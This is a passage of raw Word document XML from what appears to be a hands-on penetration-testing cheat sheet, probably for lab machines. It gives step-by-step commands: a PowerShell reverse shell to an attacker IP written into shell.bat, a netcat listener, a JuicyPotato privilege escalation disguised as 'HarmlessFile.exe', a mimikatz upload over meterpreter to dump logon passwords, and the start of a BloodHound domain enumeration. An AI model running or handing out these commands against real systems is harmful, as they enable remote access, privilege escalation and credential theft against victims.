              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
              <w:t>powershell.exe</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.14.167 1111 </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>shell.bat</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Substitute the IP address for the interface you’re connecting </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>on</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and you can call the file anything you want as long as it ends with .bat. This should be all one command input.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Also, the 1111 port number can be any available port on your machine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED083E" w14:paraId="5438BEAF" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E4B2453" w14:textId="77777777" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="33BD6962" w14:textId="7780D6C3" w:rsidR="00ED083E" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>terminal/netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0480974B" w14:textId="6A137C59" w:rsidR="00ED083E" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>Start a new netcat listener:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-lvp</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE2FFE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1111</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Be sure to match the port number with the one you used just.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED083E" w14:paraId="66F7AD87" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FF82062" w14:textId="77777777" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CFF1D28" w14:textId="1846BA5A" w:rsidR="00ED083E" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="320E3AEF" w14:textId="5742E0BD" w:rsidR="00ED083E" w:rsidRDefault="00CE2FFE" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>Switch back over to the previous netcat listener we started and should still be connected</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve">, first we need to make sure we are in the directory with the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005F1897">
              <w:t>JuciyPotato</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> file we uploaded earlier (probably named as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005F1897">
              <w:t>HarmlessFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> though, or whatever).</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:br/>
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="005F1897">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="005F1897">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">dir </w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve">to move through the file system until you reach the folder with that file in. Next, we will run the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005F1897">
              <w:t>JuicyPotato</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> file as so:</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:br/>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="00E0312F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HarmlessFile.exe</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="00E0312F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-t</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="00E0312F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="00E0312F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="00E0312F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>C:\WHATEEVER\THE\REALPATH\ADDRESS\IS\shell.bat</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:br/>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="00E0312F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005F1897" w:rsidRPr="00E0312F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1111</w:t>
            </w:r>
            <w:r w:rsidR="005F1897">
              <w:br/>
              <w:t xml:space="preserve">Please </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="005F1897">
              <w:t>note:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="005F1897">
              <w:t xml:space="preserve"> this should be all one command, not two separate inputs. Ensure the port number, specified with the -l, is the same number as the one we echoed into shell.bat back in step .d.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED083E" w14:paraId="7CD3CAF2" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46C8F18E" w14:textId="77777777" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25E7A270" w14:textId="18BD7BB2" w:rsidR="00ED083E" w:rsidRDefault="00AC6DA5" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat (2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="424F71F6" w14:textId="187537F4" w:rsidR="00ED083E" w:rsidRDefault="00AC6DA5" w:rsidP="00AC6DA5">
            <w:r>
              <w:t xml:space="preserve">Now, check back over the other, newer </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>necat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> listener we set up and a shell should have been brought up, using </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6DA5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">whoami </w:t>
            </w:r>
            <w:r>
              <w:t>should reveal that yes, we are admin.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED083E" w14:paraId="2AD4882E" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="641DAB49" w14:textId="77777777" w:rsidR="00ED083E" w:rsidRDefault="00ED083E" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6140F5A5" w14:textId="3FB29A42" w:rsidR="00ED083E" w:rsidRDefault="00AC6DA5" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="141CAAE3" w14:textId="5D322E09" w:rsidR="00ED083E" w:rsidRDefault="00AC6DA5" w:rsidP="00AC6DA5">
            <w:r>
              <w:t xml:space="preserve">Once in as admin, it is not a good time to snoop around and using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to dump passwords and users is a good idea. First, we need to check we have the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00AC6DA5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>locate</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC6DA5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>mimikatz.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AC6DA5">
              <w:t xml:space="preserve">This should bring you to at least one instance of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AC6DA5">
              <w:t>mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AC6DA5">
              <w:t xml:space="preserve"> file, copy and paste the realpath address of the file (probably the x64 version).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C56DB" w14:paraId="66634758" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="410E8245" w14:textId="1BC97CA5" w:rsidR="009C56DB" w:rsidRDefault="009C56DB" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64A86ECD" w14:textId="5B422128" w:rsidR="009C56DB" w:rsidRDefault="009C56DB" w:rsidP="00AC6DA5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CAF913B" w14:textId="1AA4B726" w:rsidR="009C56DB" w:rsidRDefault="009C56DB" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>Now, back on msfconsole, use sessions # (swap the # for the number assigned to the session) if you’re not already connected via meterpreter. Then:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D40B25">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>upload</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D40B25">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASTE_THE_REALPATH_ADDRESS_IN</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Or, background the session and in msfconsole, use cd to get yourself in the directory where the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mimikatz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file is located.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C56DB" w14:paraId="4EDBAB8F" w14:textId="77777777" w:rsidTr="00AC6DA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="36790BA7" w14:textId="1E427148" w:rsidR="009C56DB" w:rsidRDefault="009C56DB" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>.j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CC0CF52" w14:textId="77777777" w:rsidR="009C56DB" w:rsidRDefault="009C56DB" w:rsidP="00AC6DA5"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6BDE6BD5" w14:textId="34291F88" w:rsidR="009C56DB" w:rsidRPr="00D806EE" w:rsidRDefault="009C56DB" w:rsidP="00AC6DA5">
            <w:r>
              <w:t>Now, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>./mimikatz.exe</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Just make sure you’re in the same dir as the file)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sekurlsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>logonpasswords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:br/>
              <w:t>Copy and paste anything and everything useful you find!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A2B0508" w14:textId="418FF3B2" w:rsidR="00F93CE3" w:rsidRDefault="00F93CE3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="397BF3D5" w14:textId="458DEC94" w:rsidR="00F93CE3" w:rsidRDefault="00F93CE3" w:rsidP="00F93CE3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit Microsoft Domain</w:t>
      </w:r>
      <w:r w:rsidR="00102406">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:horzAnchor="margin" w:tblpY="758"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="499"/>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="8113"/>
      </w:tblGrid>
      <w:tr w:rsidR="00102406" w14:paraId="4DE452B2" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5589AB7A" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D8451F2" w14:textId="3EA83A43" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>bloodhound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="403BB6E5" w14:textId="4203EC51" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:r>
              <w:t>Be sure to install bloodhound first, check 1.j. This also will require impacket, ldap3 and dnspython to be installed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00102406" w14:paraId="2FA603C4" w14:textId="77777777" w:rsidTr="00F86349">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B4558E5" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E70280D" w14:textId="77777777" w:rsidR="00102406" w:rsidRDefault="00102406" w:rsidP="00F86349">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31128C88" w14:textId="4F8B3B7B" w:rsidR="00102406" w:rsidRDefault="00462877" w:rsidP="00F86349">
            <w:r>
              <w:t>To use bloodhound, you will need a username and password for a user in the domain you want to exploit. Then use this command:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> bloodhound </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-python -d</w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>megacorp.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00462877">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>sandra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>Password1234!</w:t>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>gc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00462877">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
